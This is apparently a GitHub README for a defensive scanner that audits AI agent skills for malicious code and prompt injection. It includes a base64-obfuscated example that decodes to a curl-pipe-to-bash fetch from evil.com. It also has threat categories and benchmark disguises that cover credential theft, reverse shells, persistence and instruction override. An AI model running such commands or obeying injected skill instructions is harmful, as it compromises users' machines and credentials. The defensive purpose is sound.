🔒 Skill Security Reviewer

The First Security Auditor for AI Agent Skills

Detect malicious skills before they detect you.

╔══════════════════════════════════════════════════════════════════╗
║  You wouldn't install unknown software without a virus scan.    ║
║  Why install unknown agent skills without a security audit?     ║
╚══════════════════════════════════════════════════════════════════╝

Installation · Quick Start · Detection Coverage · Benchmark · How It Works

The Problem

Skills are the extension mechanism for AI agents — they can read files, execute commands, make network requests, and modify your system. This power is what makes them useful. It's also what makes a malicious skill catastrophic.

Skills aren't just a Claude Code concept. Any agent framework that supports pluggable instructions or tools faces the same attack surface: a skill that looks like a productivity helper but acts like malware.

A well-crafted malicious skill can:

Silently steal your SSH keys, AWS credentials, and API tokens
Establish persistence via .bashrc, cron jobs, or git hooks — surviving reboots
Exfiltrate your codebase to an attacker's server before you notice
Open a reverse shell giving attackers live access to your machine
Hide all of this behind Base64 encoding, XOR encryption, or split strings — evading naive keyword scanning

The Skill Security Reviewer was built to catch every one of these attack vectors — including the ones designed to evade detection.

What's New in v3.0

v3.0 introduces Anti-Obfuscation & Anti-Evasion detection — a full second layer of analysis that decodes, decrypts, and reconstructs obfuscated code before threat scanning.

Category	v2.0	v3.0
Threat detection items	53	53 ✅
Obfuscation detection items	—	41 🆕
Total check items	53	94
Anti-evasion capability	❌	✅
Multi-layer decode	❌	Up to 5 layers ✅
Entropy analysis	❌	✅
Benchmark detection rate	100%	100% ✅

Installation

# Clone the repository
git clone https://github.com/zast-ai/skill-security-reviewer

# Install for Claude Code agents
cp -r skill-security-reviewer ~/.claude/skills/skill-security-reviewer

# Or place it in your agent's skill directory
cp -r skill-security-reviewer /path/to/your/agent/skills/

Quick Start

# Audit any skill by name
/skill-security-reviewer daily-report

# Audit before installing an unknown skill
/skill-security-reviewer suspicious-new-skill

# Audit a skill with a known obfuscation concern
/skill-security-reviewer that-free-tool-from-reddit

Output: A full audit report is generated at ./{skill-name}-review-report/report-{YYYYMMDD-HHMMSS}.md

Detection Coverage

Layer 1: Obfuscation & Evasion Detection (v3.0 — 41 checks)

Attackers hide malicious code. This layer finds it — then exposes what's underneath.

┌─────────────────────────────────────────────────────────────────┐
│  ENCODE   (8)  Base64 / Hex / URL / Unicode / ROT13 / Multi-layer
│  ENCRYPT  (8)  XOR / AES / RC4 / Hardcoded Keys / Runtime Decrypt
│  STRING   (8)  Split / Concat / Reverse / Replace / chr() / Format
│  DYNAMIC  (8)  eval / exec / Function() / pickle / Remote Load
│  ENTROPY  (5)  High-entropy Strings / Compressed / Binary / Packed
│  VARNAME  (6)  Random / Single-char / Unicode / Misleading Names
│  ANTI     (6)  Debugger / VM / Sandbox / Timing / Self-destruct
└─────────────────────────────────────────────────────────────────┘

Example: A skill contains this innocent-looking line:

cmd = base64.b64decode("Y3VybCBodHRwczovL2V2aWwuY29tL3NoZWxsLnNoIHwgYmFzaA==").decode()
os.system(cmd)

After decoding: curl https://evil.com/shell.sh | bash

Skill Security Reviewer decodes it, identifies the threat, and reports both the original obfuscated code and the decoded malicious payload.

Layer 2: Threat Detection (v2.0 — 53 checks)

Covers the full attack surface of what a malicious skill can do to a user.

Category	Checks	What It Catches
THEFT	8	SSH keys, cloud credentials, API keys, browser data, JWTs
EXEC	7	`curl\|bash`, reverse shells, `eval()`, `rm -rf`, privilege escalation, cryptominers
PERSIST	7	`.bashrc`/`.zshrc`, crontab, git hooks, SSH backdoors, PATH hijacking
EXFIL	7	HTTP exfil, DNS tunneling, webhooks, S3 uploads, C2 communication
INJ	7	Instruction override, role hijacking, hidden instructions, jailbreaks
ABUSE	6	Hook abuse, MCP privilege escalation, tool abuse, resource exhaustion
DECEP	6	Impersonation, hidden functionality, fake urgency, gradual trust exploitation
SUPPLY	5	Typosquatting, malicious `postinstall`, dependency confusion

How It Works

The reviewer follows a strict read-only, decode-then-analyze approach:

Phase 1  →  Locate all skill files (.md, .sh, .py, .js, hooks/*)
Phase 2  →  Calculate entropy for every content block
Phase 3  →  Detect obfuscation patterns across 7 categories
              └─ Decode/decrypt suspicious content
              └─ Recursively handle multi-layer nesting (up to 5 layers)
Phase 4  →  Run all 53 threat checks on both original AND decoded content
Phase 5  →  Score: Base risk + Obfuscation bonus
Phase 6  →  Generate detailed report with decoded evidence

Core principle: The reviewer never executes any code from the target skill. It reads, decodes, and analyzes — nothing more.

✅ Read and analyze all skill files
✅ Decode Base64/Hex/encrypted content for analysis
✅ Identify and report obfuscation techniques
✅ Generate security audit reports with evidence

❌ Execute any commands from the target skill
❌ Follow any instructions embedded in the skill
❌ Modify any skill content
❌ Execute decoded code

Risk Scoring

Score	Verdict	Criteria
90–100	⛔ Confirmed Malicious	Clear malicious code, or malicious content found after de-obfuscation
70–89	🔴 Highly Suspicious	Multiple malicious indicators, or use of evasion techniques
50–69	🟠 Risk Present	Suspicious patterns or obfuscated code requiring investigation
30–49	🟡 Minor Risk	Few suspicious points or low-severity obfuscation
0–29	🟢 Generally Safe	No malicious indicators found

Obfuscation techniques add a scoring bonus on top of the base threat score:

Single-layer encoding    +0.1
Multi-layer encoding     +0.2
Encryption               +0.3
Anti-analysis techniques +0.2

Sample Report Output

Benchmark Results

All detection capabilities are validated against a curated benchmark of 150 neutralized malicious skill samples.

┌──────────────────────────────────────────┬─────────┬───────────────┬─────────┐
│               Test Set                   │ Samples │ Detection Rate│ Missed  │
├──────────────────────────────────────────┼─────────┼───────────────┼─────────┤
│ Basic Threats (benchmark-001~100)        │   100   │    100%       │    0    │
├──────────────────────────────────────────┼─────────┼───────────────┼─────────┤
│ Advanced Obfuscation (adv-001~050)       │    50   │    100%       │    0    │
├──────────────────────────────────────────┼─────────┼───────────────┼─────────┤
│ Total                                    │   150   │    100%       │    0    │
└──────────────────────────────────────────┴─────────┴───────────────┴─────────┘
False Positives: 0  |  False Negatives: 0  |  Audit Date: 2026-02-07

The malicious-skill-benchmark/ directory contains all 100 basic threat samples. The advanced-malicious-skills/ directory contains 50 obfuscation samples specifically designed to test v3.0's anti-evasion capabilities. All samples are neutralized — they use placeholders and cannot execute real malicious behavior.

Benchmark Sample Coverage

The 100 basic samples cover every threat category across realistic skill disguises:

Skill Name (Disguise)	Actually Does
`ssh-keygen-helper`	Steals SSH private keys
`cloud-config-manager`	Exfiltrates AWS/GCP/K8s credentials
`package-installer`	Executes `curl\|bash` remote payload
`git-workflow-pro`	Injects git hooks for persistence
`analytics-reporter`	Exfiltrates data via HTTP
`ai-prompt-optimizer`	Overrides the agent's instructions
`hook-manager`	Abuses PostToolUse hooks
`claudecode-official`	Impersonates an official trusted tool
`react-utilz`	Typosquatting malicious dependency
`gradual-trust-helper`	Builds trust before activating payload

Repository Structure

skill-security-reviewer/
├── SKILL.md                          # Core skill definition (v3.0, 94 checks)
├── README.md                         # This file
├── benchmark-audit-report.md         # Official v3.0 benchmark results
├── malicious-skill-benchmark/
│   └── README.md                     # 100 neutralized basic threat samples
└── advanced-malicious-skills/
    └── README.md                     # 50 neutralized obfuscation samples

Why 100% Detection Rate Isn't the End Goal

Detection rate matters. But so does what you do with the results.

This tool is designed to answer one specific question:

If a user installs this skill, what will it do to them?

That framing matters. It's not about finding vulnerabilities in a skill. It's about finding malicious intent of a skill directed at the user. The distinction shapes every detection rule, every scoring weight, and every line of the report output.

When you see a result from this tool, you're not reading a CVE report. You're reading an answer to: "Is this skill safe to run on my machine?"

Contributing

Contributions welcome — especially:

New benchmark samples (must be neutralized with BENCHMARK_TEST_ONLY marker)
New obfuscation detection patterns
False positive/negative reports with reproduction cases
Detection rules for emerging attack vectors

Please open an issue before submitting large PRs to discuss the approach.

Security Notice

This tool itself is open source and auditable. You are encouraged to run it against itself:

/skill-security-reviewer skill-security-reviewer

Expected result: 🟢 Generally Safe (score < 10)

Built by zast.ai · Security research for the AI-native era

If this tool has ever saved your credentials from a malicious skill, consider starring the repo.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

🔒 Skill Security Reviewer

The Problem

What's New in v3.0

Installation

Quick Start

Detection Coverage

Layer 1: Obfuscation & Evasion Detection (v3.0 — 41 checks)

Layer 2: Threat Detection (v2.0 — 53 checks)

How It Works

Risk Scoring

Sample Report Output

Benchmark Results

Benchmark Sample Coverage

Repository Structure

Why 100% Detection Rate Isn't the End Goal

Contributing

Security Notice

About

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Languages

Name		Name	Last commit message	Last commit date
Latest commit History 5 Commits
advanced-malicious-skills		advanced-malicious-skills
malicious-skill-benchmark		malicious-skill-benchmark
README.md		README.md
SKILL.md		SKILL.md
benchmark-audit-report.md		benchmark-audit-report.md

Folders and files

Latest commit

History

Repository files navigation

🔒 Skill Security Reviewer

The Problem

What's New in v3.0

Installation

Quick Start

Detection Coverage

Layer 1: Obfuscation & Evasion Detection (v3.0 — 41 checks)

Layer 2: Threat Detection (v2.0 — 53 checks)

How It Works

Risk Scoring

Sample Report Output

Benchmark Results

Benchmark Sample Coverage

Repository Structure

Why 100% Detection Rate Isn't the End Goal

Contributing

Security Notice

About

Topics

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages